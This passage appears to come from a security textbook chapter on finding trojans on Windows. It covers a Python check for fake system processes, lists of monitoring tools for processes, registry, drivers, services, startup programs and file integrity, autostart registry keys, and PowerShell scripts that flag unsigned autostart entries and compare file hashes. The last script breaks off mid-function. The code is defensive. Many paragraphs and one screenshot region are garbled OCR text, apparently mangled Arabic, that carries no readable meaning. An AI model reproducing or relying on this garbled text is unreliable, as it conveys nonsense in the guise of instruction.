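    """Map digit/letter look-alikes so 'svch0st.exe' compares equal to 'svchost.exe'."""
    return name.lower().translate(str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"}))


def check_snapshot(procs: list) -> list:
    """procs: list of dicts with name, pid, ppid, path, user. Returns (pid, reason) findings."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        name = p["name"].lower()
        parent = by_pid.get(p["ppid"])
        parent_name = parent["name"].lower() if parent else None
        rule = EXPECTED.get(name)
        if rule is None:
            canon = _homoglyph_normalise(name)
            if canon in EXPECTED and canon != name:
                findings.append((p["pid"], f"{p['name']} imitates {canon}"))
            continue
        if ntpath.dirname(p["path"]).lower() != rule["dir"]:
            findings.append((p["pid"], f"{p['name']} running from {p['path']}"))
        if rule["parent"] and parent_name != rule["parent"]:
            findings.append((p["pid"], f"{p['name']} started by {parent_name or 'unknown'} instead of {rule['parent']}"))
        if rule["users"] and p["user"] not in rule["users"]:
            findings.append((p["pid"], f"{p['name']} running as {p['user']}"))
    return findings


# Constructed snapshot: the normal XP boot chain, two legitimate svchost
# instances, one fake svchost started by explorer.exe from a temp directory,
# and a look-alike name.
SAMPLE_PROCS = [
    {"name": "smss.exe",     "pid": 300,  "ppid": 4,    "path": r"C:\WINDOWS\system32\smss.exe",     "user": "SYSTEM"},
    {"name": "winlogon.exe", "pid": 640,  "ppid": 300,  "path": r"C:\WINDOWS\system32\winlogon.exe", "user": "SYSTEM"},
    {"name": "services.exe", "pid": 684,  "ppid": 640,  "path": r"C:\WINDOWS\system32\services.exe", "user": "SYSTEM"},
    {"name": "svchost.exe",  "pid": 1096, "ppid": 684,  "path": r"C:\WINDOWS\system32\svchost.exe",  "user": "SYSTEM"},
    {"name": "svchost.exe",  "pid": 1272, "ppid": 684,  "path": r"C:\WINDOWS\system32\svchost.exe",  "user": "NETWORK SERVICE"},
    {"name": "explorer.exe", "pid": 1500, "ppid": 1400, "path": r"C:\WINDOWS\explorer.exe",          "user": "alice"},
    {"name": "svchost.exe",  "pid": 2044, "ppid": 1500, "path": r"C:\DOCUME~1\alice\LOCALS~1\Temp\svchost.exe", "user": "alice"},
    {"name": "svch0st.exe",  "pid": 2100, "ppid": 1500, "path": r"C:\WINDOWS\system32\svch0st.exe",  "user": "alice"},
]

if __name__ == "__main__":
    for pid, reason in check_snapshot(SAMPLE_PROCS):
        print(f"PID {pid}: {reason}")
```

Each of these checks is cheap and none of them depends on a signature, which is why they keep working against a freshly recompiled open-source trojan that antivirus does not yet know.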
What's Running

Source: http://www.whatsrunning.net

What's Running is a tool for exploring what is going on inside a Windows 2000/XP/2003/Vista/Windows 7 system. It lists processes, services, modules, IP connections, drivers and startup programs, and provides details about each of them:

- IP connections: all IP connections currently open on the system, with the process that owns each of them.
- Modules: the DLLs and executables loaded into the processes on the system.
- Drivers: the installed drivers and their status. An unfamiliar driver deserves attention, since kernel-mode rootkits such as ZeroAccess install themselves as drivers.
- System information: details about the operating system, memory, CPU and similar properties.


[Figure: What's Running main window with the Processes tab selected, listing process name, PID, user name (SYSTEM or Administrator), CPU and memory for winlogon.exe, explorer.exe, chrome.exe and others; the status bar reports counts for IP Connections, Drivers and Startup items, and a Process Properties pane for the selected chrome.exe shows Process ID, Parent Process ID, CPU, memory statistics (page fault count, working set size, paged and non-paged pool quotas, page file usage), file version, I/O and services.]

Autoruns

Source: http://technet.microsoft.com/en-US

Autoruns (Autoruns.exe) shows which programs are configured to run when the system boots or when a user logs in, and in what order Windows processes them. It covers the Run and RunOnce registry keys, the startup folder, Explorer and Internet Explorer add-ons, scheduled tasks, services, drivers, Winlogon notifications, LSA providers, network providers and more, so a trojan's persistence entry shows up here whichever location it chose. Autoruns.exe presents the entries as follows:
[Figure: Autoruns (Sysinternals) window with tabs Everything, Logon, Explorer, Internet Explorer, Scheduled Tasks, Services, Drivers, Winlogon, LSA Providers, Network Providers and Sidebar Gadgets. Each entry shows Autorun Entry, Description, Publisher and Image Path; the visible rows come from HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and include Intel hotkey and persistence modules, the Adobe Reader speed launcher and an EPSON USB display service.]
Switching between the tabs lets you review each autostart location separately; entries with no publisher, or with an image path in an unusual directory, are the ones to examine first.

PrcView (Process Viewer)

PrcView (Process Viewer) is a process viewer for Windows that shows detailed information about the processes running on the system. It is available both as a GUI and as a command-line tool, and it lets you inspect each process and terminate it if necessary.


[Figure: PrcView window listing the running processes with their image path (C:\Program Files\Common Files\..., C:\WINDOWS\system32\...), PID, priority and start time.]
On Linux, the equivalent information comes from the top and ps commands.

Process Monitoring Tools

The following tools also monitor running processes and help you see which ones are legitimate and which are not:
Winsonar, available at http://www.softpedia.com/get/Syste^ (link truncated in the original)
HiddenFinder, available at http://download.cnet.com/HiddenFinder/3C (link truncated in the original)
KillProcess, available at http://orangelampsoftware.com
Security Task Manager, available at http://www.neuber.com
Yet Another (remote) Process Monitor, available at http://yaprocmon.sourceforge.net
MONIT, available at http://mmonit.com
Process Monitor, available at http://technet.microsoft.com
OpManager, available at http://www.manageengine.com

(Scanning for Suspicious Registry Entries) ^ j^AaJI Registry ^Vl^jJ £p 

Emilia all Cjljjisull Ja^lj q\ aJ .registry t c^"^* ^Vl^j ^-^J ^ ^ t jlg^. ^^ic a^ljjla (jL^a^ C-UJJJ ^JJ LaAjc 

el)- 0 registry ^ ^— a u^l'^ Aili^JI djU^lcVl ^AxJI .^^^-laj r-n ^Uaill Cj\ j& <^ (j^aljcVI 

registry c> ^*LiI> cjhLijVI UjIHj isuj Jj^jll .sjIjjL (jc- L_Lj£Il ^Luj ^1 j jjjUI CjVU^VI ^h^Xa 

- Run
- RunServices
- RunOnce
- RunServicesOnce
- HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %*

^9 dal <uLlj]| ^^)^ u^j^>*^ .lA^j^)"^ ^^jojI ^jAslII ^jc ^ s ^jl ^j-d ^jjuLaII djVl^^^-i registry ^-a^a 

.AiniJl AiSaj^jl registry 



jv16 PowerTools 2014 - Registry Cleaner

http://www.macecraft.com
j^j registry *Ua*j ^ jj^ e^ 1 ^ ^^'j registry cleaner jvl6 PowerTools 2014 
*tai (jjmVi ^ ^-^t <-dl^klujl 4 .6^1 j^ia 4 u ^i^l <iajoj| jj lAjUij] c _^j3I registry ^Vl^^j (jc t ajuj^H ^ ^cLaajj registry 
ga^Jlj (jUiVl (jjoi^jj IVIRUj history Cy* <J^ 1 * a .^" ^ la^J) <L^)laj Aij^^xJI ciAiLJI ^ ^1 ^L^.jlail t jjALjll 



[Figure: jv16 PowerTools 2014 main window (File, Language, Tools, Help menu) with the sections Registry Tools, File Tools, System Tools, Privacy Tools, Backups, Action History and Settings, a "Control which programs start automatically" option, Statistics and PC Health panels, and a status line reporting how many registry errors were fixed and files deleted; footer: "jv16 PowerTools (3.1.0.1321) running on Windows 8 Professional"]
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Registry Entry Monitoring Tool: PC Tools Registry 

Source: http://www.pctools.com

l^L^I j£\ aj> c^VU^registry ^ ^ registry cleaner PC Tools Registry Mechanic 

[Figure: PC Tools Registry Mechanic main window, http://www.pctools.com]
Registry Entry Monitoring Tools 
CjI jjVi c> ^axJI cilU^i t pc Tools Registry Mechanicj jvl6 PowerTools 2014-Registry Cleaner J\ Ail^VW 
^ Lpa*j c ^Jj Uua j .dj^j <j] 66^1 j^ia (jl > ^>^> c-ujjj (jc c flj^£Jt ^cLaaj ^UJLj c Registry <j5Ij-<J till ^uujj ^jII 

: JU1I ^5!^ Registry c <jhn ^^^0^ j l^l^kiujl y-^lRegistry J^M j5l ^->tj^> 
Reg Organizer available at http://www.chemtable.com
Registry Shower available at http://www.registryshower.com
Comodo Cloud Scanner available at http://www.comodo.com
Buster Sandbox Analyzer available at http://bsa.isoftware.nl
All-Seeing Eye available at http://www.fortego.com
MJ Registry Watcher available at http://www.jacobsm.com
Active Registry Monitor available at http://www.devicelock.com
Regshot available at http://regshot.sourceforge.net
Registry Live Watch available at http://leelusoft.blogspot.in



Scanning For Suspicious Device Drivers 



j| a i£ sj (jL^jjjl! (jli AiSlU Sjj^ dijaul ^^jI! j^U^aII t alia a ^» (device drivers) lS^*-^ 2^°^ iJj^* ^ U»Ajc 

i, jl^-aJI (Jjxjaij luaj djlj^l a I laJLujI J (j^lj AjlikV ^Uai£ *>i& o^lj^)Ia A L 1 a iklLujJ Cilia _^Uaill C5 ic CIujjj C5 ic <J jj^^JI 

Uui ^i^jll j 4Jfc jjjauJl cJ-j.Tr-t.Tu (j^a^a ( . la>J cillil ^L-Lai^ll ( . ilaal JjixjaLill ^Ia^LujI j lg-J ^jjj ^ jjc. j > ^> ^ 
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I Trojan Device 
Driver

Trojans are installed along with device drivers downloaded from untrusted sources and use these drivers as a shield to avoid detection.

Scan for suspicious device drivers and verify that they are genuine and downloaded from the publisher's original site.

Go to Run, type msinfo32 -> Software Environment -> System Drivers



Device Drivers Monitoring Tool: Driver View 

http://www.nirsoft.net 

4_jaljjal dLa q^jc ^jj .t^L ^aLkll ^Uaill UIIa. l^liAaj ^^jll o^-^.VI (Jjxjujj ^c^I^j 4_L»l£ 4^jla (j^a^uDriverView sl^VI 
6^cj1a11 ^jujI 6 jIaj^VI L^a jll t^ixjaull ^c^U^j (Jj^vi ^jl <JiLa <Lajta3l ^ ^ (device driver)* lS^*-*^ ^^-^ cJ^ 

.HTML jtJ& ^4* j ^4? o- 3 ^ flkiSI 



[Figure: DriverView window (File, Edit, Options, Help menu) listing the loaded drivers with columns for driver name, load address, type (system driver, network driver, application), description, version and company, e.g. tcpipreg.sys "TCP/IP Registry Compatibility Driver", srvnet.sys "Server Network driver", HTTP.sys "HTTP Protocol Stack", condrv.sys "Console Driver", all by Microsoft Corporation]
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
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
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
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
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
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
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
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
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
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
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
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
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
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
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
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
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
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
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
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
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Device Drivers Monitoring Tools 



I^jVI^ D^lj^)Ia (jL^a^. (jC L_Lu£3l ^£ ^cLaaJ <^^J (J^*-^ '^ a J dll j^l '<ax 1 ^Jj Uu3 

Driver Detective available at http://www.drivershq.com
Unknown Device Identifier available at http://www.zhangduo.com
DriverGuide Toolkit available at http://www.driverguidetoolkit.com
DriverMax available at http://www.innovative-sol.com
Driver Magician available at http://www.drivermagician.com
Driver Reviver available at http://www.reviversoft.com
DriverScanner available at http://www.uniblue.com
Double Driver available at http://www.boozet.org
My Drivers available at http://www.zhangduo.com
DriverEasy available at http://www.drivereasy.com



Scanning For Suspicious Windows Services 



Cy* J^ * - ^ u^^W^ cJ^-^ l>* 6 {windows service) jj^j <*-^^ jjia q\ >^>^ ^uffi ^j^i 

.6^1 J^la jj\ >^*^ (jC L_Lu£3l cilj£ dJ 6 jjAlij djLd^k Aj^^)3I 



_4JLi±k CjI <uLlj ^jj^djj L_fl^Jl jtg_^JL Asu ^jc ^aall ^jj^^l g a\\ ^xujjj jjAlij djLd^k Lull} <^j3I 6^lj^)Ja 4_L^a^j 



^■Ui^j L_jc!^!il3 rootkit ^ jffi lJ^z* ji s^l jjla 3 u <^^\ m ^J^Sl\ <> . )W\ J^.) ^ ^jqjq^ Windows j j^f^ I^jLAac aj^joij 

.Wyi-c *Ui.V HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services (registry key) J*-JI 



Trojans spawn Windows services that allow attackers remote control of the victim machine and pass malicious instructions.




[Figure: list of running Windows services and the executables behind them, annotated with the two callouts below]
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
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
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Trojans rename their processes 
to look like a genuine Windows service in order to avoid detection.

Trojans employ rootkit techniques to manipulate the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services registry keys to hide their processes.
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Windows Services Monitoring Tool: Windows Service Manager (SrvMan) 



Source: http://tools.sysprogs.org/srvman
jj a £ dj 11a . jj^jjj CjLd^k ^Jaii^ll <^UJI ^l^-ttll ^*aJ jL^aikl J-<ixj till ^ajujj ( ^j3I sbVI j& Windows Service Manager 
djLd^kj L_jc^dll j djUi^iJI 5-1x1] Uiajl ■ jj^j^ lS^*-^ sjIc] jl l_ fllijj ^jjAj Legacy drivers j Win32 J <alik^ CjUi^k 

ClAjLilaJ JjixjaLil aA^LujJ ^jl Uiajl cl£^ jVl J^>^ JJ J^^ ^Vim^l J (JJ* > ^ j (^^Jc- J^^ ^-g-^ .L£^>^^ ^l^C- VI 

.Windows c> ^ 64j ^ 32 c> l£ j* j .<u^ Win32 

[Figure: Windows Service Manager (SrvMan) window (File, View, Service, Help menu) with columns Internal name, State, Type, Display name, Start type and Executable, listing services and drivers such as COM+ System Application, condrv (Console Driver), Cryptographic Services, DcomLaunch (DCOM Server Process Launcher), Dhcp (DHCP Client), disk (Disk Driver), Dnscache (DNS Client) and DPS (Diagnostic Policy Service) with their svchost.exe or .sys paths; buttons Properties, Start service, Restart service, Add service and Exit]

Other Windows Services Monitoring Tools 

i^Ull j^ll ^ JjjoJI ^ <Sj^j jflljjj Windows <^^1 jll 
Smart Utility available at http://www.thewindowsclub.com
Netwrix Service Monitor available at http://www.netwrix.com
Vista Services Optimizer available at http://www.smartpcutilities.com
ServiWin available at http://www.nirsoft.net
Windows Service Manager Tray available at http://winservicemanager.codeplex.com
AnVir Task Manager available at http://www.anvir.com
Process Hacker available at http://processhacker.sourceforge.net
Free Windows Service Monitor Tool available at http://www.manageengine.com
Overseer Network Monitor available at http://www.overseer-network-monitor.com
Total Network Monitor available at http://www.softinventive.com
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Scanning For Suspicious Startup Programs 

4Jfc jJjuLaII (J-iT-Jult pAj £cxat^)J (J^a^a ttillil .^Uailt pAj Ajc Ujlfllj l^ii Igili 6 jj jJJ^ti j^-^- ^^-Sc 1 (pjffi tS^t ^ u^i^l 

alt S^tj^Ia 4 L ^t <ilU& <jl£ tit La AjA^J aJ ;4JaJjau3t djt jiaaJt ^tita ,6^tj^)ia (jL^a. (jc t L1£A] tA^. ^jj^jJa 

Startup ^V* LK»ai ^ JjVt SjlaaJl 

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

C:\Users\(User-Name)\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

(J-liiuult ^»Uaj (J.1t.uiJ f,Aj Ajc Lit (J-aJtlt t^JJ ^^jlt CjLdAiJt (J^a^S 

Go to Run, type services.msc, and click Sort by Startup Type 

.registry ^ J j» cjVIaj] <j-a^i 

.Lit J ^vil t Iajj ^1 (device driver) SjsVtfl J^-*^ o-^^ 

C:\Windows\System32\drivers

Check boot.ini or bcd (bootmgr) entries.



Windows 8 Startup Registry Entries
I^VIS registry cjVUjI ^ IajUJ jj^j Jj» » n^t ftk> Jji ,^ aj)aj a^ Lit Jaxj ^jJI Cjllnkilt 



Explorer Startup Setting:
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Common Startup
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Common Startup
- HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Startup
- HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Startup
- HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows, load

Windows Startup Setting:
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

IE Startup Setting:
- HKCU\Software\Microsoft\Internet Explorer\UrlSearchHooks
- HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar
- HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions
- HKCU\SOFTWARE\Microsoft\Internet Explorer\MenuExt

Programs that run on Windows startup can be located in these registry entries.
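As an added example that is not part of the book, the following PowerShell script walks the autostart locations the text lists (the Run/RunOnce keys above, the two Startup folders, and the Services key from the Windows services section) and reports every entry whose program is missing or does not carry a valid Authenticode signature. It assumes Windows PowerShell 5.1 or later and an account that can read HKLM; the function names are the author's own.

```powershell
# Added example (not from the book): walk the autostart locations the text
# lists and flag every entry whose program is missing or not validly signed.
# Assumes Windows PowerShell 5.1+ and an account that can read HKLM.

# Run/RunOnce values from the "Windows 8 Startup Registry Entries" list.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
# The two Startup folders from "Scanning For Suspicious Startup Programs".
$startupFolders = @(
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
)
# Services key from "Scanning For Suspicious Windows Services".
$servicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'

function Get-ExecutableFromCommandLine {
    # Extract the program path from a Run value or service ImagePath. Values may
    # be quoted, carry arguments, use %SystemRoot%, \SystemRoot\ or \??\ prefixes,
    # or (driver entries) be written relative to the Windows directory.
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd.StartsWith('"') -and $cmd.IndexOf('"', 1) -gt 1) {
        $exe = $cmd.Substring(1, $cmd.IndexOf('"', 1) - 1)
    } elseif ($cmd -match '^(.+?\.(exe|sys|dll|cmd|bat))(\s|$)') {
        $exe = $Matches[1]
    } else {
        $exe = ($cmd -split '\s+')[0]
    }
    $exe = $exe -replace '^\\\?\?\\', ''
    $exe = $exe -replace '^\\SystemRoot\\', "$env:SystemRoot\"
    if (-not [IO.Path]::IsPathRooted($exe)) { $exe = Join-Path $env:SystemRoot $exe }
    return $exe
}

function Resolve-ShortcutTarget {
    # Startup folders usually hold .lnk shortcuts; check the target, not the link.
    param([string]$Path)
    if ($Path -notlike '*.lnk') { return $Path }
    $target = (New-Object -ComObject WScript.Shell).CreateShortcut($Path).TargetPath
    if ($target) { return $target } else { return $Path }
}

function Test-AutostartEntry {
    param([string]$Location, [string]$Name, [string]$CommandLine)
    $exe = Get-ExecutableFromCommandLine $CommandLine
    $status = 'MissingFile'; $signer = ''
    if ($exe -and (Test-Path -LiteralPath $exe -PathType Leaf)) {
        $sig = Get-AuthenticodeSignature -LiteralPath $exe
        $status = $sig.Status.ToString()   # Valid, NotSigned, HashMismatch, NotTrusted, ...
        if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
    }
    [pscustomobject]@{ Location = $Location; Name = $Name; Path = $exe;
                       Signature = $status; Signer = $signer }
}

$results = @()
foreach ($key in $runKeys) {
    if (-not (Test-Path -LiteralPath $key)) { continue }
    foreach ($p in (Get-ItemProperty -LiteralPath $key).PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSParentPath metadata
        $results += Test-AutostartEntry -Location $key -Name $p.Name -CommandLine ([string]$p.Value)
    }
}
foreach ($folder in $startupFolders) {
    foreach ($f in Get-ChildItem -LiteralPath $folder -File -ErrorAction SilentlyContinue) {
        $results += Test-AutostartEntry -Location $folder -Name $f.Name -CommandLine (Resolve-ShortcutTarget $f.FullName)
    }
}
foreach ($svc in Get-ChildItem -LiteralPath $servicesKey -ErrorAction SilentlyContinue) {
    $cmd = (Get-ItemProperty -LiteralPath $svc.PSPath -ErrorAction SilentlyContinue).ImagePath
    if (-not $cmd) { continue }
    # svchost-hosted services live in a DLL named under Parameters\ServiceDll;
    # checking svchost.exe itself (Microsoft-signed) would prove nothing.
    if ($cmd -match 'svchost\.exe') {
        $dll = (Get-ItemProperty -LiteralPath "$($svc.PSPath)\Parameters" -ErrorAction SilentlyContinue).ServiceDll
        if ($dll) { $cmd = $dll }
    }
    $results += Test-AutostartEntry -Location $servicesKey -Name $svc.PSChildName -CommandLine $cmd
}

# Anything that is not a present, validly signed file deserves a closer look:
# compare its Signer (or the lack of one) against the publisher's own site.
$results | Where-Object { $_.Signature -ne 'Valid' } | Sort-Object Location, Name | Format-Table -AutoSize
```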



Startup Programs Monitoring Tool: Starter 
registry £jVI^I ^tAxlj ^JL . JjxjuHH ^Uaj Jj^vi LaAk. Ujlili Iajj c ^2lt ^t^Jt Sjtajj <jia^>xj till ^joij Starter 

.Ujl^j ' * W jt 6£>A}A^. ^Ludjjj 

DLL t**^* l!^ cijULixJI ijp. <xjoj j>» CjLq jlx-d (jiajc ^ j£ view C5-^ jjj^'^t <jjL^Jt CjULqjJI ^jjuj l^ajt ^ i£ sj Starter 
'NT 'ME 6 x9 jj^j ^ j^jj^^ a ivw^\t 4_iLix]t pl^jjj t^lt tdjbjljVlj 'threats t^jSlill ^t iki^t ^^kiuwJt 
Jji^t ^ ^ registry operations ^ j t^ U aI^J^ cjUlki. a^jj V .liyui j '2003 'XP '2000 

.4^aLk Jj^aj (Jji^ L-lUaJJ ^tj-WindOWS NT S Vnm^ t 
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SKMtrt (Server J 



- Jl St^tup takfan (I) 
Aa AD uteri ill 

~ A r*9«»* nn 
m R*m« 

J» ftgnOntt »: I j 
ft_ aji nun O OJ 

* Run ?. 

0 fcgnOrvcc 

Ji RunQrwrf... 

0 RunS*fVKIt 

0 RunS*rntt^. 

« *un 

» ■ *■ 

1 



f*t Drlrtr 



a ■ 

0 - 

B 
B 

BA 

mm 

BO 

BS^ 
B 

0- 
H 

□y 

B 

0i 



APC 

Dn-,*i D*t*cTTv* 

dtrir«xe 

EkomSofl DPR 5 
IMI7 Net*** 

gpogtottl 

*nMVmijii 

mint 

IC.fr* 
svcndti! 
Trt*. 



C .Pnsgf#*n i,*15Kf kmnsfl#l P«s*wS RKO*#fy._ 
C ..Pwgc*m fU«* u*ft\f MTTtM* T_nc**M» 
C:\Pt*gwn F*h C-ttjMRSOnl P ^ tct rt ^SON U5_ 
C ".Piwgr*™ f lies (■4^'JNit*'Sc^'*'»r* i PcWc Lc<h F- 
C \Pwfr#m Fife (■S6)\Goog«c' Go<hgf« 1a*\qooqhK,- 

'OvIPtO^Mm In*** (i*6J , '.WW»**p* Lrv* M*4i*<Hj*f m 
UnHKfcJvb RHtti Owcfc 



R*qra»y 
R#9«try 
Rc^ln, 



Mbcrwrw Run 

- Uur Run 

- M«<ll*rM Run 

- P,ti<hm* Run 

- Lpjct Run 

- MtcNnc Run 

- P.tirhirue Run 

- Lk*t Run 

- Mtachirw Run 
tfUhn 

- 14k hart* Run 

• MtaNrM Run . 

- Uw Run Once 

- UvrrRun 



bs5 v«* 



(MET Mettfctr '{ruurHtd M 
IPSO** USB VUtflPq 

myin^om* Lrvt Mtttm^n 

•Rigl 



: . 



Startup Programs Monitoring Tool: Security AutoRun 

Source: http://tcpmonitor.altervista.org
i^^iAsH ^jjuj ^jj . jjAijj cJ^*-^ , ^ c ' Ujlils l^liA^j ^jj ^^jII cijlLniaiill ^LajIs q^^x! till ^^jujj Security AutoRun 

tc^LJI jl^-fljj 6^1^31 ^1 t command-line string 'drivers ^U^JI ^common/user 'registry uf- J^»^ 
a Aiaji .(JjxjuHI I Jasu ^^jII adware j> ^h^i^jII £L * a ^^ cJ? 1 ^ ^Uaj j-^^j ^jjoJI ^jujI 

.x9/ME/NT/2000/XPA^ista/7 ^ ^ ^ 




Other Startup Programs Monitoring Tools 

Absolute Startup manager available at http ://www . absolutestartup . com 
Activestartup available at http://www.hexilesoft.com 
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StartEd Lite available at http : //www . outertech .com 
Startup Inspector available at http://www.windowsstartup.com
Autoruns for Windows available at http://technet.microsoft.com 
Program Starter available at http://www.ab-tools.com
Disable Startup available at http://www.disablestartup.com
StartupMonitor available at http://www.mlin.net 

Chameleon Startup Manager available at http://www.chameleon-managers.com
Startup Booster available at http://www.smartpctools.com



Scanning for Suspicious Files and Folders 



FCIV -

SHA-1 J MD5 £y*j\Af£ csXS ^ ^ sbVl File Checksum Integrity Verifier (FCIV) 

CjliLJl ^-lA^J S^LuuJl (Jjjl^Jl (j-a (jjaJJj t _jjud^J J-^J^ ^A 3 ^ J& (Jj ,<L^*J ^aJ CjULJl (JA lj i^j] XME 

.XML 4 cjUUj s^IS ^ jjSII I^jj c*L 3 >^Uti 

C:\FCIV>fciv.exe c:\hash.txt
//
// File Checksum Integrity Verifier version 2.05.
//
6b1fb2f76c139c82253732e1c8824cc2 c:\hash.txt

Tripwire 

Source: http://www.tripwire.com

^)LajJsj (J-ol£ ^iUlojl cJ^Jij 4j1^j3I (j^l^l djUJaixJI l^liaj ^pll ^I^cVI ^£^j3I cj! j^a ja jj Tripwire Enterprise 

,<C>1 L gall jjjlstxij jjjIslaIIj ^jI J^J AjI^UI ClLoaljjual] (JljlaVI 

SIGVERIF - 

Source: http://books.google.com and http://books.google.co.in
aIo .^UailU ^L^ald <*i j*JI j^j <*3 j^ll Jjxj&II jj ^ j-^j (signature) g& j& Cy* obi ^ SIGVERIF 

.fil jn^VI (jC 4-ilIa j ^c^Ujill j ^Uaill (J^xjujJ S^tclj ^ a ^1 dJ 6^3 j-g JJC. cJjxjujJ ^c-gUjj (j-a ^1 JJJ*JI 

'SIGVERIF fS WINDOWS+R jj d»» j^W ^ jUtfil u^j jl RUN l3> jisll ^ Start l3> >1U pJ i3 - 



[Figure: File Signature Verification (sigverif) dialog. Its text reads: "To help maintain the integrity of your system, critical files have been digitally signed so that any changes to these files can be quickly detected. Click Advanced to customize verification options. Click Start to check for any system files that are not digitally signed." Buttons: Start, Close, Advanced]
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.start ti> j^tj fjii - 

Investigator . jSj^-aill jW ^J* lP 3 jf- £ J^ult ^ t> <SIGVERIF ^ 

sigverif.txt ^ SIGVERIF ^ j ^1 j^l j jj <^IS ^ jjkll -gSaj 

.jj^jll ^ J WINNT j <%windir% ^» 



Files and Folder Integrity Checker: FastSum and WinMD5

^ j CjI^JI j djULJI <j£Lj* aA\ till ^joli (files and folder integrity checker) cjI^V^JIj CjULJI a^L* <j-a^i 

.Guardian file systems j OSS o-^^j jAtfll lWSII 



FastSum 

Source: http://www.fastsum.com

A^L* jSa^ll jJUl *UjI 2^ e^ 1 ^ <£^' J 6 (MD5 checksum algorithm) MD5 jjl ^ ^ FastSum 
<j^aLkli ^-^^(fingerprint) djUu^aj ^UijU ^3 .FastSum ^ <L^aLaJl CjUUJI C5 Ic SjWuhII &j .CjULJI 

.CD/DVD c5j^ J^l J «^S1I 





WinMD5

Source: http://www.blisstonia.com

c> lU^ ^! US .CjULI! ("fingerprint") MD5 u^U M L^J (7 ^ ^ ,2000) Jj^j sbi > WinMD5 v2.0 

CIjUL j3 jj 4 Jll<Jl tdiU^Jj .MD5SUM ^ ^ 3j ja^Sl ^Laaajuoll djUu^aJl JjJa Cjlxu^aJl AjUII 
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WinMD5 v2. 04 (C) 2003-2004 by eolson@mit.edu 



[Figure: WinMD5 window (File, Edit, Help menu) showing "Currently Processing: (idle)", "0 items enqueued", an "Errors Found" indicator and a table with columns Path, Hash, Bytes and Status that lists an empty test file marked BAD, an MD5SUM file marked loaded, README.txt marked Good and WinMD5.exe; status bar: "Number of known md5 hashes found in MD5SUM files: 4" and "Drag files and MD5SUM files (if available) into this window"; buttons Clear and Abort]


Files and Folder Integrity Checker 



Advanced Checksum Verifier (ACSV) available at http://www.irnis.net
Fsum Frontend available at http://fsumfe.sourceforge.net
Verisys available at http://www.ionx.co.uk
AFICK (Another File Integrity Checker) available at http://afick.sourceforge.net
File Integrity Monitoring available at http://www.ncircle.com
Attribute Manager available at http://www.miklsoft.com
PA File Sight available at http://www.poweradmin.com
CSP File Integrity Checker available at http://www.tandemsecurity.com
ExactFile available at http://www.exactfile.com
OSSEC available at http://www.ossec.net
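As an added example (not code from the book or from FCIV, Tripwire or any tool listed above), the following PowerShell functions implement the baseline-and-compare check those tools perform over a directory tree: New-IntegrityBaseline records a hash for every file, and Compare-IntegrityBaseline later reports what was added, modified or removed. It assumes PowerShell 4.0 or later (for Get-FileHash); the function names and the CSV layout are the author's own.

```powershell
# Added example (not from the book): a minimal file-integrity baseline/verify
# routine in the spirit of FCIV and Tripwire. SHA-256 is used rather than the
# MD5/SHA-1 that FCIV emits, since both of those are collision-prone.
# The baseline file must be kept where an intruder cannot rewrite it
# (read-only media or another host), otherwise the comparison proves nothing.

function New-IntegrityBaseline {
    param(
        [Parameter(Mandatory)][string]$Path,          # directory tree to fingerprint
        [Parameter(Mandatory)][string]$BaselineFile   # CSV written here
    )
    $root = (Resolve-Path -LiteralPath $Path).ProviderPath
    Get-ChildItem -LiteralPath $root -File -Recurse -Force |
        ForEach-Object {
            $h = Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
            if (-not $h) { return }                   # skip files we cannot read
            [pscustomobject]@{
                RelativePath = $_.FullName.Substring($root.Length).TrimStart('\')
                Hash         = $h.Hash
                Length       = $_.Length
                LastWrite    = $_.LastWriteTimeUtc.ToString('o')
            }
        } | Export-Csv -LiteralPath $BaselineFile -NoTypeInformation
}

function Compare-IntegrityBaseline {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$BaselineFile
    )
    $root = (Resolve-Path -LiteralPath $Path).ProviderPath
    $baseline = @{}
    foreach ($row in Import-Csv -LiteralPath $BaselineFile) { $baseline[$row.RelativePath] = $row }
    $seen = @{}
    $out = New-Object System.Collections.Generic.List[object]
    foreach ($f in Get-ChildItem -LiteralPath $root -File -Recurse -Force) {
        $rel = $f.FullName.Substring($root.Length).TrimStart('\')
        $seen[$rel] = $true
        $h = Get-FileHash -LiteralPath $f.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
        if (-not $h) { continue }
        if (-not $baseline.ContainsKey($rel)) {
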